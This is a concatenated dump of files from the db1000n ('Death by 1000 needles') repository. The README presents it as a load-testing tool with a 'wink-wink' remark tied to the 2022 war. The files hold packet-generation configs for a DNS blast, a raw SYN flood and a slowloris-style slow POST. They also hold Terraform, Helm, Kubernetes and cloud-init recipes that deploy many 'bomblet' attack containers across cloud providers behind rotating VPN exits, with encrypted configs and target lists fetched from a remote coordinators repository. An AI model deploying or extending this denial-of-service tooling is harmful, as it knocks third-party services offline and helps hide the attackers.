} 11 | 12 | variable "attack_commands" { 13 | default = null 14 | description = "The command to execute an attack with support of specifying additional flags." 15 | } 16 | 17 | variable "attack_environment_variables" { 18 | default = { "ENABLE_PRIMITIVE" : "false" } 19 | description = "Environment variables for the container." 20 | } 21 | -------------------------------------------------------------------------------- /.ko.yaml: -------------------------------------------------------------------------------- 1 | defaultBaseImage: gcr.io/distroless/static 2 | builds: 3 | - id: db1000n 4 | dir: . 5 | main: . 6 | env: 7 | - CGO_ENABLED=0 8 | flags: 9 | - -tags=encrypted 10 | ldflags: 11 | - -s -w 12 | - -extldflags "-static" 13 | - -X github.com/Arriven/db1000n/src/utils/ota.Version={{ .Env.VERSION }} 14 | - -X github.com/Arriven/db1000n/src/utils.ProtectedKeys={{ .Env.PROTECTED_KEYS }} 15 | - -X github.com/Arriven/db1000n/src/job/config.DefaultConfig={{ .Env.DEFAULT_CONFIG_VALUE }} 16 | - -X github.com/Arriven/db1000n/src/job.DefaultConfigPathCSV={{ .Env.DEFAULT_CONFIG_PATH }} 17 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-dnsblast.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | static_packet: true # will only generate packet once instead of doing it on every iteration 5 | connection: 6 | type: net 7 | args: 8 | protocol: "udp" 9 | address: "localhost:53" 10 | packet: 11 | payload: 12 | type: dns 13 | data: 14 | id: "{{ random_int_n 10000 }}" 15 | op_code: 0 16 | rd: true 17 | questions: 18 | - name: "{{ random_alphanum 10 }}.example.com" 19 | type: 1 20 | class: 1 21 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/README.md: -------------------------------------------------------------------------------- 1 | # db1000n Helm charts 2 | 3 | ## If you want to use plain manifests, see [Manifests](/db1000n/advanced-docs/kubernetes/manifests/) 4 | 5 | This is a Helm chart for Kubernetes 6 | 7 | ## Prerequisites 8 | 9 | Make sure that you installed `helm` package on your local machine and you have connection to the Kubernetes cluster. 10 | 11 | ## Install a release 12 | 13 | ```bash 14 | cd kubernetes/helm-charts/ 15 | helm upgrade --install \ 16 | --create-namespace \ 17 | --namespace=db1000n \ 18 | -f values.yaml db1000n . 19 | ``` 20 | 21 | ## Destroy a release 22 | 23 | ```bash 24 | helm uninstall db1000n -n db1000n 25 | ``` 26 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/variables.tf: -------------------------------------------------------------------------------- 1 | variable "hcloud_token" { 2 | type = string 3 | sensitive = true 4 | } 5 | 6 | variable "ssh_public_key" { 7 | type = string 8 | } 9 | 10 | # https://registry.terraform.io/providers/hetznercloud/hcloud/latest/docs/resources/server#location 11 | variable "location" { 12 | type = string 13 | default = "hel1" 14 | } 15 | 16 | variable "instance_count" { 17 | type = number 18 | default = 1 19 | } 20 | 21 | # https://www.hetzner.com/cloud 22 | variable "server_type" { 23 | type = string 24 | default = "cx11" 25 | } 26 | 27 | variable "os_type" { 28 | type = string 29 | default = "ubuntu-20.04" 30 | } 31 | -------------------------------------------------------------------------------- /kubernetes/helm-charts/values.yaml: -------------------------------------------------------------------------------- 1 | replicaCount: 1 2 | 3 | image: 4 | repository: ghcr.io/arriven/db1000n 5 | pullPolicy: Always 6 | # Available images: https://github.com/Arriven/db1000n/pkgs/container/db1000n 7 | tag: latest 8 | 9 | envVars: 10 | - name: "ENABLE_PRIMITIVE" 11 | value: "false" 12 | 13 | resources: 14 | {} 15 | # limits: 16 | # cpu: 2 17 | # memory: 2Gi 18 | # requests: 19 | # cpu: 100m 20 | # memory: 128Mi 21 | 22 | imagePullSecrets: [] 23 | nameOverride: "" 24 | fullnameOverride: "" 25 | 26 | podAnnotations: {} 27 | podSecurityContext: {} 28 | securityContext: {} 29 | nodeSelector: {} 30 | tolerations: [] 31 | affinity: {} 32 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [tool.poetry] 2 | name = "db1000n-docs" 3 | version = "0.1.0" 4 | description = "Documentation for DB1000N project with MkDocs" 5 | authors = ["Bohdan Ivashko "] 6 | 7 | [tool.poetry.dependencies] 8 | python = "^3.10" 9 | mkdocs = "^1.2.3" 10 | mkdocs-include-markdown-plugin = "^3.3.0" 11 | mkdocs-material = "^8.2.5" 12 | mkdocs-minify-plugin = "^0.5.0" 13 | mkdocs-redirects = "^1.0.3" 14 | mkdocs-static-i18n = "^0.44" 15 | mkdocs-git-tag-plugin = "^0.1.0" 16 | mdx_truly_sane_lists = "^1.2" 17 | 18 | [tool.poetry.dev-dependencies] 19 | 20 | [build-system] 21 | requires = ["poetry-core>=1.0.0"] 22 | build-backend = "poetry.core.masonry.api" 23 | -------------------------------------------------------------------------------- /src/core/packetgen/raw_conn_windows.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | // +build windows 3 | 4 | package packetgen 5 | 6 | import "errors" 7 | 8 | // unsupported on windows 9 | type rawConn struct{} 10 | 11 | func openRawConn() (*rawConn, error) { 12 | return nil, errors.New("raw connections not supported on windows") 13 | } 14 | 15 | func (conn *rawConn) Write(packet Packet) (n int, err error) { 16 | return 0, errors.New("raw connections not supported on windows") 17 | } 18 | 19 | func (conn *rawConn) Close() error { 20 | return nil 21 | } 22 | 23 | func (conn *rawConn) Target() string { return "raw://" } 24 | 25 | func (conn *rawConn) Read(_ []byte) (int, error) { return 0, nil } 26 | -------------------------------------------------------------------------------- /terraform/aws_eks/modules/kubernetes/variables.tf: -------------------------------------------------------------------------------- 1 | variable "profile" { 2 | description = "AWS profile" 3 | } 4 | 5 | variable "vpc_id" { 6 | description = "VPC ID" 7 | } 8 | 9 | variable "cluster_name" { 10 | description = "EKS cluster name" 11 | } 12 | 13 | variable "cluster_endpoint" { 14 | description = "EKS cluster endpoint" 15 | } 16 | 17 | variable "cluster_ca_data" { 18 | description = "EKS cluster certificate authority data" 19 | } 20 | 21 | variable "worker_node_iam_role_arn" { 22 | description = "EKS worker node role ARN" 23 | } 24 | 25 | variable "autoscaler_iam_role_arn" { 26 | description = "EKS cluster autoscaler role ARN" 27 | } -------------------------------------------------------------------------------- /.github/workflows/terraformci.yaml: -------------------------------------------------------------------------------- 1 | name: terraform-ci 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | pull_request: 8 | branches: 9 | - main 10 | paths: 11 | - 'terraform/**' 12 | 13 | jobs: 14 | validate-fmt-check: 15 | runs-on: ubuntu-latest 16 | name: Validate and format terraform configuration 17 | steps: 18 | - name: Checkout 19 | uses: actions/checkout@v2 20 | - name: terraform validate 21 | uses: dflook/terraform-validate@v1 22 | with: 23 | path: terraform 24 | - name: terraform fmt 25 | uses: dflook/terraform-fmt-check@v1 26 | with: 27 | path: terraform 28 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | connection: 5 | type: raw 6 | args: 7 | name: "ip4:tcp" 8 | address: "0.0.0.0" 9 | packet: 10 | network: 11 | type: ipv4 12 | data: 13 | src_ip: "{{ local_ip }}" 14 | dst_ip: '{{ resolve_host "localhost" }}' 15 | transport: 16 | type: tcp 17 | data: 18 | src_port: "{{ random_port }}" 19 | dst_port: "1234" 20 | flags: 21 | syn: true 22 | payload: 23 | type: raw 24 | data: 25 | payload: "test" 26 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-ipv6.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | connection: 5 | type: raw 6 | args: 7 | name: "ip6:tcp" 8 | address: "::1" 9 | packet: 10 | network: 11 | type: ipv6 12 | data: 13 | src_ip: "{{ local_ipv6 }}" 14 | dst_ip: '{{ resolve_host_ipv6 "localhost" }}' 15 | transport: 16 | type: tcp 17 | data: 18 | src_port: "{{ random_port }}" 19 | dst_port: "{{ random_port }}" 20 | flags: 21 | syn: true 22 | payload: 23 | type: raw 24 | data: 25 | payload: "test" 26 | -------------------------------------------------------------------------------- /terraform/azure/bomblet/main.tf: -------------------------------------------------------------------------------- 1 | resource "azurerm_container_group" "main" { 2 | count = var.bomblet_count 3 | name = format("%s-%s", "${var.prefix}-${var.region}", format("%02d", count.index + 1)) 4 | location = var.region 5 | resource_group_name = var.resource_group_name 6 | ip_address_type = "None" 7 | os_type = "Linux" 8 | restart_policy = "Always" 9 | 10 | container { 11 | name = "main" 12 | image = var.attack_image 13 | cpu = var.attack_cpu 14 | memory = var.attack_memory 15 | 16 | environment_variables = var.attack_environment_variables 17 | commands = var.attack_commands 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/utils/metrics/stats_tracker.go: -------------------------------------------------------------------------------- 1 | package metrics 2 | 3 | func NewStatsTracker(metrics *Metrics) *StatsTracker { 4 | return &StatsTracker{metrics: metrics} 5 | } 6 | 7 | // StatsTracker generalizes tracking stats changes between reports 8 | type StatsTracker struct { 9 | lastStats PerTargetStats 10 | lastTotals Stats 11 | metrics *Metrics 12 | } 13 | 14 | func (st *StatsTracker) sumStats(groupTargets bool) (stats PerTargetStats, totals Stats, statsInterval PerTargetStats, totalsInterval Stats) { 15 | stats, totals = st.metrics.SumAllStats(groupTargets) 16 | statsInterval, totalsInterval = stats.Diff(st.lastStats), Diff(totals, st.lastTotals) 17 | st.lastStats, st.lastTotals = stats, totals 18 | 19 | return 20 | } 21 | -------------------------------------------------------------------------------- /terraform/vultr/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | vultr = { 4 | source = "vultr/vultr" 5 | version = "2.10.0" 6 | } 7 | } 8 | } 9 | 10 | resource "vultr_ssh_key" "ssh_key" { 11 | name = "my-ssh-key" 12 | ssh_key = file("${var.key}.pub") 13 | } 14 | 15 | resource "vultr_instance" "my_instance" { 16 | count = var.num_inst 17 | plan = var.plan 18 | region = var.region 19 | app_id = var.app 20 | ssh_key_ids = [vultr_ssh_key.ssh_key.id] 21 | 22 | provisioner "remote-exec" { 23 | script = "scripts/deploy.sh" 24 | 25 | connection { 26 | host = self.main_ip 27 | private_key = file("${var.key}") 28 | } 29 | } 30 | } 31 | 32 | 33 | -------------------------------------------------------------------------------- /examples/config/advanced/packetgen-slowloris.yaml: -------------------------------------------------------------------------------- 1 | jobs: 2 | - type: packetgen 3 | args: 4 | interval: "10s" 5 | connection: 6 | type: net 7 | args: 8 | protocol: "udp" 9 | address: "google.com:1234" 10 | tls_config: 11 | insecure_skip_verify: true 12 | packets: 13 | - packet: 14 | payload: 15 | type: raw 16 | data: 17 | payload: "POST /someapi HTTP/1.1\nHost: localhost\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 1000\n\n" 18 | - count: 1000 19 | packet: 20 | payload: 21 | type: raw 22 | data: 23 | payload: "a" 24 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/user_data.yml: -------------------------------------------------------------------------------- 1 | #cloud-config 2 | runcmd: 3 | - wget -c https://github.com/Arriven/db1000n/releases/latest/download/db1000n_linux_amd64.tar.gz -O - | tar -xz 4 | - systemctl daemon-reload 5 | - systemctl enable db1000n 6 | - systemctl start db1000n 7 | 8 | write_files: 9 | - content: | 10 | [Unit] 11 | Description=db1000n service 12 | After=syslog.target network.target 13 | 14 | [Service] 15 | SuccessExitStatus=143 16 | 17 | User=root 18 | Group=root 19 | 20 | Type=simple 21 | 22 | WorkingDirectory=/ 23 | ExecStart=/db1000n 24 | ExecStop=/bin/kill -15 $MAINPID 25 | 26 | [Install] 27 | WantedBy=multi-user.target 28 | path: /etc/systemd/system/db1000n.service 29 | -------------------------------------------------------------------------------- /.github/workflows/test.yaml: -------------------------------------------------------------------------------- 1 | name: Test 2 | 3 | on: 4 | push: 5 | branches: 6 | - "main" 7 | pull_request: 8 | paths: 9 | - "src/**" 10 | - "main.go" 11 | - "go.mod" 12 | - "go.sum" 13 | 14 | jobs: 15 | test: 16 | strategy: 17 | matrix: 18 | go-version: [1.18.x] 19 | os: [ubuntu-latest, macos-latest, windows-latest] 20 | runs-on: ${{ matrix.os }} 21 | steps: 22 | - name: Install Go 23 | uses: actions/setup-go@v2 24 | with: 25 | go-version: ${{ matrix.go-version }} 26 | - name: Checkout code 27 | uses: actions/checkout@v2 28 | - name: Build 29 | run: go build ./... 30 | - name: Test 31 | run: go test ./... 32 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | 17 | main 18 | config.json 19 | 20 | # macOS 21 | .DS_Store 22 | 23 | # Ansible 24 | **/inventory.cfg 25 | 26 | # Terraform 27 | **/.terraform* 28 | **/terraform.tfstate* 29 | 30 | # JetBrains 31 | .idea 32 | 33 | # VScode 34 | .vscode 35 | 36 | # Installation artifacts 37 | *.tar.gz 38 | db1000n 39 | *.md5 40 | md5sum.txt 41 | 42 | .history 43 | 44 | # OpenVPN data 45 | /openvpn/*.ovpn 46 | /openvpn/auth.txt 47 | -------------------------------------------------------------------------------- /ansible/linux/countries.txt: -------------------------------------------------------------------------------- 1 | Hong Kong 2 | Singapore 3 | India 4 | Canada 5 | Japan 6 | Germany 7 | Mexico 8 | Australia 9 | United Kingdom 10 | Netherlands 11 | Spain 12 | South Korea 13 | Switzerland 14 | France 15 | Philippines 16 | Malaysia 17 | Sri Lanka 18 | Italy 19 | Pakistan 20 | Kazakhstan 21 | Thailand 22 | Indonesia 23 | Taiwan 24 | Vietnam 25 | Macau 26 | Cambodia 27 | Mongolia 28 | Laos 29 | Myanmar 30 | Nepal 31 | Kyrgyzstan 32 | Uzbekistan 33 | Bangladesh 34 | Bhutan 35 | Brazil 36 | Panama 37 | Chile 38 | Argentina 39 | Bolivia 40 | Colombia 41 | Venezuela 42 | Ecuador 43 | Guatemala 44 | Peru 45 | Uruguay 46 | Bahamas 47 | Sweden 48 | Romania 49 | Turkey 50 | Ireland 51 | Iceland 52 | Norway 53 | Denmark 54 | Belgium 55 | Greece 56 | Portugal 57 | Austria 58 | Finland -------------------------------------------------------------------------------- /terraform/vultr/README.md: -------------------------------------------------------------------------------- 1 | # Vultr deployment 2 | 3 | ## Requirements 4 | 5 | * Vultr account 6 | * API token 7 | * `terraform` 8 | 9 | ## Deploy 10 | 11 | ```bash 12 | export VULTR_API_KEY="Your Vultr API Key" 13 | terraform init 14 | terraform plan -var "key=" -var "num_inst=" 15 | terraform apply -var "key=" -var "num_inst=" 16 | ``` 17 | 18 | ## Destroy 19 | 20 | To delete all the resources that were created run 21 | 22 | ```bash 23 | terraform destroy 24 | ``` 25 | 26 | ## Tips 27 | 28 | Deploy script installs vnstat util that is useful for monitoring server network performance. 29 | Example, get network statistics for the last 5 hours: 30 | 31 | ```bash 32 | ssh root@ip vnstat -h 5 33 | ``` 34 | -------------------------------------------------------------------------------- /terraform/heroku/main.tf: -------------------------------------------------------------------------------- 1 | resource "random_integer" "random" { 2 | min = 1 3 | max = 9999999 4 | } 5 | 6 | resource "heroku_app" "app" { 7 | name = "db1000n-${random_integer.random.result}" 8 | region = var.region 9 | 10 | config_vars = { 11 | GOVERSION = "1.18" 12 | CONFIG = "${var.config_path}" 13 | } 14 | 15 | buildpacks = [ 16 | "heroku/go" 17 | ] 18 | } 19 | 20 | resource "heroku_build" "build" { 21 | app_id = heroku_app.app.id 22 | 23 | source { 24 | url = "${var.repo}/archive/v${var.app_version}.tar.gz" 25 | } 26 | } 27 | 28 | resource "heroku_formation" "formation" { 29 | app_id = heroku_app.app.id 30 | type = "worker" 31 | quantity = var.instance_count 32 | size = var.instance_type 33 | depends_on = [heroku_build.build] 34 | } 35 | -------------------------------------------------------------------------------- /terraform/digital_ocean/README.md: -------------------------------------------------------------------------------- 1 | # Digital Ocean deployment 2 | 3 | ## Requirements 4 | 5 | - Digital Ocean account 6 | - API token (Go to API - Personal access tokens) and generate Personal access token (with write permissions) 7 | - `terraform` (1.0+) installed 8 | 9 | ## Deploy 10 | 11 | To deploy: 12 | 13 | ```sh 14 | export DO_TOKEN= 15 | terraform init 16 | terraform plan -var "do_token=${DO_TOKEN}" 17 | terraform apply -var "do_token=${DO_TOKEN}" 18 | ``` 19 | 20 | After deployment (usually takes 5-10 mins) go to [Apps List](https://cloud.digitalocean.com/apps), find an app with name `db1000n` and chek Runtime Logs. 21 | 22 | ## Destroy 23 | 24 | To destroy: 25 | 26 | ```sh 27 | export DO_TOKEN= 28 | terraform destroy -var "do_token=${DO_TOKEN}" 29 | ``` 30 | -------------------------------------------------------------------------------- /terraform/heroku/variables.tf: -------------------------------------------------------------------------------- 1 | variable "email" { 2 | type = string 3 | } 4 | 5 | variable "api_key" { 6 | type = string 7 | sensitive = true 8 | } 9 | 10 | variable "region" { 11 | type = string 12 | default = "eu" 13 | } 14 | 15 | variable "repo" { 16 | type = string 17 | default = "https://github.com/Arriven/db1000n" 18 | } 19 | 20 | variable "app_version" { 21 | type = string 22 | } 23 | 24 | variable "instance_count" { 25 | type = number 26 | default = 1 27 | } 28 | 29 | # https://devcenter.heroku.com/articles/dyno-types 30 | variable "instance_type" { 31 | type = string 32 | default = "free" 33 | } 34 | 35 | variable "config_path" { 36 | type = string 37 | default = "https://raw.githubusercontent.com/db1000n-coordinators/LoadTestConfig/main/config.v0.7.json" 38 | } 39 | -------------------------------------------------------------------------------- /.github/workflows/markdownlint.yaml: -------------------------------------------------------------------------------- 1 | name: markdownlint 2 | on: 3 | push: 4 | tags: 5 | - v* 6 | branches: 7 | - master 8 | - main 9 | pull_request: 10 | paths: 11 | - "**.md" 12 | - ".github/workflows/markdownlint.yaml" 13 | - "db1000n.rb" 14 | permissions: 15 | contents: read 16 | # Optional: allow read access to pull request. Use with `only-new-issues` option. 17 | # pull-requests: read 18 | jobs: 19 | markdownlint: 20 | name: Lint repository 21 | runs-on: ubuntu-latest 22 | steps: 23 | - uses: actions/checkout@v2 24 | - name: Set up Ruby 25 | uses: ruby/setup-ruby@v1 26 | with: 27 | ruby-version: "3.1" 28 | - name: Install mdl 29 | run: gem install mdl 30 | - name: Run markdownlint 31 | run: mdl -s ./db1000n.rb . 32 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:1.18 as builder 2 | 3 | WORKDIR /build 4 | # pre-copy/cache go.mod for pre-downloading dependencies and only redownloading them in subsequent builds if they change 5 | COPY go.mod . 6 | RUN go mod download && go mod verify 7 | COPY . . 8 | ARG ENCRYPTION_KEYS 9 | ARG DEFAULT_CONFIG_VALUE 10 | ARG DEFAULT_CONFIG_PATH 11 | ARG CA_PATH_VALUE 12 | ARG PROMETHEUS_BASIC_AUTH 13 | RUN make build_encrypted 14 | 15 | FROM alpine:3.15.2 as advanced 16 | 17 | RUN apk add --no-cache --update curl 18 | 19 | WORKDIR /usr/src/app 20 | COPY --from=builder /build/db1000n . 21 | 22 | CMD ["./db1000n", "--enable-primitive=false"] 23 | 24 | FROM alpine:3.15.2 25 | 26 | RUN apk add --no-cache --update curl 27 | 28 | WORKDIR /usr/src/app 29 | COPY --from=builder /build/db1000n . 30 | 31 | VOLUME /usr/src/app/config 32 | 33 | ENTRYPOINT ["./db1000n"] 34 | -------------------------------------------------------------------------------- /terraform/digital_ocean/variables.tf: -------------------------------------------------------------------------------- 1 | variable "do_token" { 2 | type = string 3 | sensitive = true 4 | } 5 | 6 | variable "repo" { 7 | type = string 8 | default = "https://github.com/Arriven/db1000n" 9 | } 10 | 11 | variable "instance_count" { 12 | type = number 13 | default = 1 14 | } 15 | 16 | # https://docs.digitalocean.com/reference/api/api-reference/#operation/list_instance_sizes 17 | variable "instance_size_slug" { 18 | type = string 19 | default = "professional-xs" 20 | } 21 | 22 | # https://docs.digitalocean.com/reference/api/api-reference/#operation/list_all_regions 23 | variable "region" { 24 | type = string 25 | default = "nyc1" 26 | } 27 | 28 | variable "config_path" { 29 | type = string 30 | default = "https://raw.githubusercontent.com/db1000n-coordinators/LoadTestConfig/main/config.v0.7.json" 31 | } 32 | -------------------------------------------------------------------------------- /terraform/aws_eks/outputs.tf: -------------------------------------------------------------------------------- 1 | # data sources 2 | output "account_id" { 3 | description = "AWS Account ID" 4 | value = data.aws_caller_identity.current.account_id 5 | } 6 | 7 | output "caller_arn" { 8 | description = "User ARN" 9 | value = data.aws_caller_identity.current.arn 10 | } 11 | 12 | output "caller_user" { 13 | value = data.aws_caller_identity.current.user_id 14 | } 15 | 16 | # variables 17 | output "region" { 18 | description = "AWS region" 19 | value = var.region 20 | } 21 | 22 | output "profile" { 23 | description = "AWS profile" 24 | value = var.profile 25 | } 26 | 27 | output "projects" { 28 | description = "AWS project" 29 | value = var.project 30 | } 31 | 32 | output "environment" { 33 | description = "AWS environment" 34 | value = terraform.workspace 35 | } -------------------------------------------------------------------------------- /terraform/gcp_expressvpn/README.md: -------------------------------------------------------------------------------- 1 | # GCP + ExpressVPN deployment 2 | 3 | ## Requirements 4 | 5 | - [GCP account](http://console.cloud.google.com) 6 | - Subscription on [expressvpn.com](https://www.expressvpn.com) (get the activation code) 7 | - `terraform` installed 8 | 9 | ## Init 10 | 11 | To init Terraform run: 12 | 13 | ```sh 14 | terraform init 15 | ``` 16 | 17 | Need to create terraform/gcp_expressvpn/terraform.tfvars file and set two variables values tou yours 18 | 19 | ```sh 20 | project_id = "google-project-id" 21 | expressvpn_key = "expressvpn-activation-code" 22 | ``` 23 | 24 | Other vars can be overwritten in this file id needed. 25 | 26 | ## Deploy 27 | 28 | To deploy run: 29 | 30 | ```sh 31 | terraform apply 32 | ``` 33 | 34 | ## Destroy 35 | 36 | To destroy infrastructure use commands: 37 | 38 | ```sh 39 | terraform destroy 40 | ``` 41 | -------------------------------------------------------------------------------- /.github/workflows/test-installer.yaml: -------------------------------------------------------------------------------- 1 | name: Test install.sh 2 | 3 | on: 4 | push: 5 | branches: 6 | - "main" 7 | paths: 8 | - 'install.sh' 9 | - '.github/workflows/test-installer.yaml' 10 | 11 | jobs: 12 | ubuntu-mac-test: 13 | strategy: 14 | matrix: 15 | os: [ubuntu-latest, macos-latest] 16 | runs-on: ${{ matrix.os }} 17 | steps: 18 | - name: Checkout code 19 | uses: actions/checkout@v2 20 | - name: Run ShellCheck 21 | uses: ludeeus/action-shellcheck@master 22 | - name: Installer 23 | run: ./install.sh 24 | windows-test: 25 | strategy: 26 | matrix: 27 | os: [windows-latest] 28 | runs-on: ${{ matrix.os }} 29 | steps: 30 | - name: Checkout code 31 | uses: actions/checkout@v2 32 | - name: Installer 33 | run: ./install.sh 34 | -------------------------------------------------------------------------------- /terraform/hetzner_cloud/README.md: -------------------------------------------------------------------------------- 1 | # Hetzner Cloud deployment 2 | 3 | ## Requirements 4 | 5 | - Hetzner Cloud account 6 | - API token (Go to Project - Security - API Tokens) and create a token 7 | - `terraform` (1.0+) installed 8 | 9 | ## Deploy 10 | 11 | To deploy: 12 | 13 | ```sh 14 | export HCLOUD_TOKEN= 15 | export SSH_PUBLIC_KEY="" 16 | terraform init 17 | terraform plan -var "hcloud_token=${HCLOUD_TOKEN}" -var "ssh_public_key=${SSH_PUBLIC_KEY}" 18 | terraform apply -var "hcloud_token=${HCLOUD_TOKEN}" -var "ssh_public_key=${SSH_PUBLIC_KEY}" 19 | ``` 20 | 21 | ## Destroy 22 | 23 | To destroy: 24 | 25 | ```sh 26 | export HCLOUD_TOKEN= 27 | export SSH_PUBLIC_KEY="" 28 | terraform destroy -var "hcloud_token=${HCLOUD_TOKEN}" -var "ssh_public_key=${SSH_PUBLIC_KEY}" 29 | ``` 30 | -------------------------------------------------------------------------------- /terraform/aws_ec2/README.md: -------------------------------------------------------------------------------- 1 | # AWS EC2 deployment 2 | 3 | ## Requirements 4 | 5 | - AWS account 6 | - `terraform` installed 7 | 8 | ## Deploy 9 | 10 | To deploy run: 11 | 12 | ```sh 13 | terraform apply -var-file="ireland.tfvars" 14 | ``` 15 | 16 | You can create new `*.tfvars` files for different regions and accounts. 17 | To swich between regions you can use `terraform workspace` command. 18 | 19 | For example: 20 | 21 | ```sh 22 | terraform init 23 | terraform workspace new eu 24 | terraform apply -var-file="ireland.tfvars" 25 | terraform workspace new us 26 | terraform apply -var-file="useast.tfvars" 27 | ``` 28 | 29 | ## Destroy 30 | 31 | To destroy infrastructure use commands: 32 | 33 | ```sh 34 | terraform workspace select eu 35 | terraform destroy -var-file="ireland.tfvars" 36 | terraform workspace select us 37 | terraform destroy -var-file="useast.tfvars" 38 | ``` 39 | -------------------------------------------------------------------------------- /kubernetes/manifests/deployment.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | apiVersion: v1 3 | kind: Namespace 4 | metadata: 5 | name: db1000n 6 | 7 | --- 8 | apiVersion: apps/v1 9 | kind: Deployment 10 | metadata: 11 | name: db1000n 12 | namespace: db1000n 13 | labels: 14 | app: db1000n 15 | spec: 16 | replicas: 1 17 | selector: 18 | matchLabels: 19 | app: db1000n 20 | template: 21 | metadata: 22 | labels: 23 | app: db1000n 24 | spec: 25 | containers: 26 | - name: db1000n 27 | image: ghcr.io/arriven/db1000n:latest 28 | env: 29 | - name: ENABLE_PRIMITIVE 30 | value: "false" 31 | imagePullPolicy: Always 32 | resources: 33 | requests: 34 | memory: "512Mi" 35 | cpu: "500m" 36 | limits: 37 | memory: "2048Mi" 38 | cpu: "2" 39 | -------------------------------------------------------------------------------- /src/utils/templates/math.go: -------------------------------------------------------------------------------- 1 | package templates 2 | 3 | func mod(lhs, rhs int) int { 4 | return lhs % rhs 5 | } 6 | 7 | func add(lhs, rhs int) int { 8 | return lhs + rhs 9 | } 10 | 11 | func sub(lhs, rhs int) int { 12 | return lhs - rhs 13 | } 14 | 15 | func umod(lhs, rhs uint) uint { 16 | return lhs % rhs 17 | } 18 | 19 | func uadd(lhs, rhs uint) uint { 20 | return lhs + rhs 21 | } 22 | 23 | func usub(lhs, rhs uint) uint { 24 | return lhs - rhs 25 | } 26 | 27 | func mod64(lhs, rhs int64) int64 { 28 | return lhs % rhs 29 | } 30 | 31 | func add64(lhs, rhs int64) int64 { 32 | return lhs + rhs 33 | } 34 | 35 | func sub64(lhs, rhs int64) int64 { 36 | return lhs - rhs 37 | } 38 | 39 | func umod64(lhs, rhs uint64) uint64 { 40 | return lhs % rhs 41 | } 42 | 43 | func uadd64(lhs, rhs uint64) uint64 { 44 | return lhs + rhs 45 | } 46 | 47 | func usub64(lhs, rhs uint64) uint64 { 48 | return lhs - rhs 49 | } 50 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Death by 1000 needles 2 | 3 | See [Docs](https://arriven.github.io/db1000n) 4 | 5 | [![Made in Ukraine](https://img.shields.io/badge/made_in-ukraine-ffd700.svg?labelColor=0057b7)](https://stand-with-ukraine.pp.ua) 6 | 7 | This is a simple distributed load generation tool written in Go. 8 | It is able to fetch a simple JSON config from a local or remote location. 9 | The config describes which load generation jobs should be launched in parallel. 10 | There are other existing tools doing the same kind of job. 11 | I do not intend to copy or replace them but rather provide a simple open source alternative so that users have more options. 12 | Feel free to use it in your load tests (wink-wink). 13 | 14 | The software is provided as is under no guarantee. 15 | I will update both the repository and this documentation as I go during following days (date of writing this is 26th of February 2022, third day of Russian invasion into Ukraine). 16 | 17 | -------------------------------------------------------------------------------- /kubernetes/manifests/daemonset.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | apiVersion: v1 3 | kind: Namespace 4 | metadata: 5 | name: db1000n 6 | 7 | --- 8 | apiVersion: apps/v1 9 | kind: DaemonSet 10 | metadata: 11 | name: db1000n 12 | namespace: db1000n 13 | labels: 14 | app: db1000n 15 | spec: 16 | selector: 17 | matchLabels: 18 | name: db1000n 19 | template: 20 | metadata: 21 | labels: 22 | name: db1000n 23 | spec: 24 | containers: 25 | - name: db1000n 26 | image: ghcr.io/arriven/db1000n:latest 27 | env: 28 | - name: ENABLE_PRIMITIVE 29 | value: "false" 30 | imagePullPolicy: Always 31 | resources: 32 | requests: 33 | memory: "128Mi" 34 | cpu: "128m" 35 | limits: 36 | memory: "2048Mi" 37 | cpu: "2" 38 | nodeSelector: 39 | db1000n: "true" 40 | terminationGracePeriodSeconds: 30 41 | -------------------------------------------------------------------------------- /terraform/heroku/README.md: -------------------------------------------------------------------------------- 1 | # Heroku deployment 2 | 3 | ## Requirements 4 | 5 | - Heroku account 6 | - API token (Go to Account settings - API Key) and reveal API key 7 | - `terraform` (1.0+) installed 8 | 9 | ## Deploy 10 | 11 | To deploy: 12 | 13 | ```sh 14 | export EMAIL= 15 | export API_KEY= 16 | terraform init 17 | terraform plan -var "email=${EMAIL}" -var "api_key=${API_KEY}" 18 | terraform apply -var "email=${EMAIL}" -var "api_key=${API_KEY}" 19 | ``` 20 | 21 | Go to [apps list](https://dashboard.heroku.com/apps) and ensure that application successfully deployed. 22 | You can check logs for application with Heroku CLI: [https://devcenter.heroku.com/articles/logging#view-logs](https://devcenter.heroku.com/articles/logging#view-logs) 23 | 24 | ## Destroy 25 | 26 | To destroy: 27 | 28 | ```sh 29 | export EMAIL= 30 | export API_KEY= 31 | terraform destroy -var "email=${EMAIL}" -var "api_key=${API_KEY}" 32 | ``` 33 | -------------------------------------------------------------------------------- /ansible/aws/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | ## Prerequisites 4 | 5 | 1. Ansible 2.9 6 | 1. Collection amazon.aws (can be installed by command `ansible-galaxy collection install amazon.aws`) 7 | 1. Created key pair and public key stored in `AWS.pub` in same folder as the `aws-provisioning.yaml` playbook 8 | 9 | Here you can read a manual on AWS account creation: [AWS 